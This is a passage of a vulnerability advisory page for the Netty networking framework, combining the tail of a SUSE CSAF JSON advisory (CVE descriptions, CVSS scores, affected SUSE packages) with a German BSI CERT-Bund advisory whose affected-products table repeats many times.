"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-09T08:13:58Z",
"details": "important"
}
],
"title": "CVE-2026-42587"
},
{
"cve": "CVE-2026-44248",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-44248"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, the MQTT 5 header Properties section is parsed and buffered before any message size limit is applied. Specifically, in MqttDecoder, the decodeVariableHeader() method is called before the bytesRemainingBeforeVariableHeader \u003e maxBytesInMessage check. The decodeVariableHeader() can call other methods which will call decodeProperties(). Effectively, Netty does not apply any limits to the size of the properties being decoded. Additionally, because MqttDecoder extends ReplayingDecoder, Netty will repeatedly re-parse the enormous Properties sections and buffer the bytes in memory, until the entire thing parses to completion. This can cause high resource usage in both CPU and memory. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-44248",
"url": "https://www.suse.com/security/cve/CVE-2026-44248"
},
{
"category": "external",
"summary": "SUSE Bug 1265293 for CVE-2026-44248",
"url": "https://bugzilla.suse.com/1265293"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-09T08:13:58Z",
"details": "moderate"
}
],
"title": "CVE-2026-44248"
}
]
}
WID-SEC-W-2026-1372
Vulnerability from csaf_certbund - Published: 2026-05-05 22:00 - Updated: 2026-06-10 22:00Summary
Netty: Mehrere Schwachstellen
Severity
Mittel
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung: Netty ist ein asynchrones, ereignisgesteuertes Netzwerk-Anwendungs-Framework für die schnelle Entwicklung von wartbaren, hochleistungsfähigen Protokollservern und -clients.
Angriff: Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Netty ausnutzen, um Sicherheitsmaßnahmen zu umgehen, Daten zu manipulieren, vertrauliche Informationen offenzulegen oder einen Denial-of-Service-Zustand zu verursachen.
Betroffene Betriebssysteme: - Sonstiges
- UNIX
Affected products
Known affected
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Open Source Keycloak <26.6.3
Open Source / Keycloak
|
<26.6.3 | ||
|
Open Source Netty <4.2.13.Final
Open Source / Netty
|
<4.2.13.Final | ||
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source Netty <4.1.133.Final
Open Source / Netty
|
<4.1.133.Final |
Affected products
Known affected
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Open Source Keycloak <26.6.3
Open Source / Keycloak
|
<26.6.3 | ||
|
Open Source Netty <4.2.13.Final
Open Source / Netty
|
<4.2.13.Final | ||
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source Netty <4.1.133.Final
Open Source / Netty
|
<4.1.133.Final |
Affected products
Known affected
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Open Source Keycloak <26.6.3
Open Source / Keycloak
|
<26.6.3 | ||
|
Open Source Netty <4.2.13.Final
Open Source / Netty
|
<4.2.13.Final | ||
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source Netty <4.1.133.Final
Open Source / Netty
|
<4.1.133.Final |
Affected products
Known affected
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Open Source Keycloak <26.6.3
Open Source / Keycloak
|
<26.6.3 | ||
|
Open Source Netty <4.2.13.Final
Open Source / Netty
|
<4.2.13.Final | ||
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source Netty <4.1.133.Final
Open Source / Netty
|
<4.1.133.Final |
Affected products
Known affected
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Open Source Keycloak <26.6.3
Open Source / Keycloak
|
<26.6.3 | ||
|
Open Source Netty <4.2.13.Final
Open Source / Netty
|
<4.2.13.Final | ||
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source Netty <4.1.133.Final
Open Source / Netty
|
<4.1.133.Final |
Affected products
Known affected
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Open Source Keycloak <26.6.3
Open Source / Keycloak
|
<26.6.3 | ||
|
Open Source Netty <4.2.13.Final
Open Source / Netty
|
<4.2.13.Final | ||
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source Netty <4.1.133.Final
Open Source / Netty
|
<4.1.133.Final |
Affected products
Known affected
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Open Source Keycloak <26.6.3
Open Source / Keycloak
|
<26.6.3 | ||
|
Open Source Netty <4.2.13.Final
Open Source / Netty
|
<4.2.13.Final | ||
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source Netty <4.1.133.Final
Open Source / Netty
|
<4.1.133.Final |
Affected products
Known affected
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Open Source Keycloak <26.6.3
Open Source / Keycloak
|
<26.6.3 | ||
|
Open Source Netty <4.2.13.Final
Open Source / Netty
|
<4.2.13.Final | ||
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source Netty <4.1.133.Final
Open Source / Netty
|
<4.1.133.Final |
Affected products
Known affected
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Open Source Keycloak <26.6.3
Open Source / Keycloak
|
<26.6.3 | ||
|
Open Source Netty <4.2.13.Final
Open Source / Netty
|
<4.2.13.Final | ||
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source Netty <4.1.133.Final
Open Source / Netty
|
<4.1.133.Final |
Affected products
Known affected
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Open Source Keycloak <26.6.3
Open Source / Keycloak
|
<26.6.3 | ||
|
Open Source Netty <4.2.13.Final
Open Source / Netty
|
<4.2.13.Final | ||
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source Netty <4.1.133.Final
Open Source / Netty
|
<4.1.133.Final |
Affected products
Known affected
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Open Source Keycloak <26.6.3
Open Source / Keycloak
|
<26.6.3 | ||
|
Open Source Netty <4.2.13.Final
Open Source / Netty
|
<4.2.13.Final | ||
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source Netty <4.1.133.Final
Open Source / Netty
|
<4.1.133.Final |
Affected products
Known affected
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Open Source Keycloak <26.6.3
Open Source / Keycloak
|
<26.6.3 | ||
|
Open Source Netty <4.2.13.Final
Open Source / Netty
|
<4.2.13.Final | ||
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source Netty <4.1.133.Final
Open Source / Netty
|
<4.1.133.Final |
Affected products
Known affected
6 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Open Source Keycloak <26.6.3
Open Source / Keycloak
|
<26.6.3 | ||
|
Open Source Netty <4.2.13.Final
Open Source / Netty
|
<4.2.13.Final | ||
|
SUSE Linux
SUSE
|
cpe:/o:suse:suse_linux:-
|
— | |
|
Red Hat Enterprise Linux
Red Hat
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Ubuntu Linux
Ubuntu
|
cpe:/o:canonical:ubuntu_linux:-
|
— | |
|
Open Source Netty <4.1.133.Final
Open Source / Netty
|
<4.1.133.Final |
References
21 references
| URL | Category |
|---|---|
| https://wid.cert-bund.de/.well-known/csaf/white/2… | self |
| https://wid.cert-bund.de/portal/wid/securityadvis… | self |
| https://github.com/netty/netty/security/advisorie… | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://github.com/advisories/GHSA-v8h7-rr48-vmmv | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://github.com/netty/netty/security/advisorie… | external |
| https://www.keycloak.org/2026/06/keycloak-2663-released | external |
| https://ubuntu.com/security/notices/USN-8401-1 | external |
| https://lists.suse.com/pipermail/sle-security-upd… | external |
| https://access.redhat.com/errata/RHSA-2026:24502 | external |
| https://access.redhat.com/errata/RHSA-2026:23808 | external |
| https://access.redhat.com/errata/RHSA-2026:25123 | external |
{
"document": {
"aggregate_severity": {
"text": "mittel"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
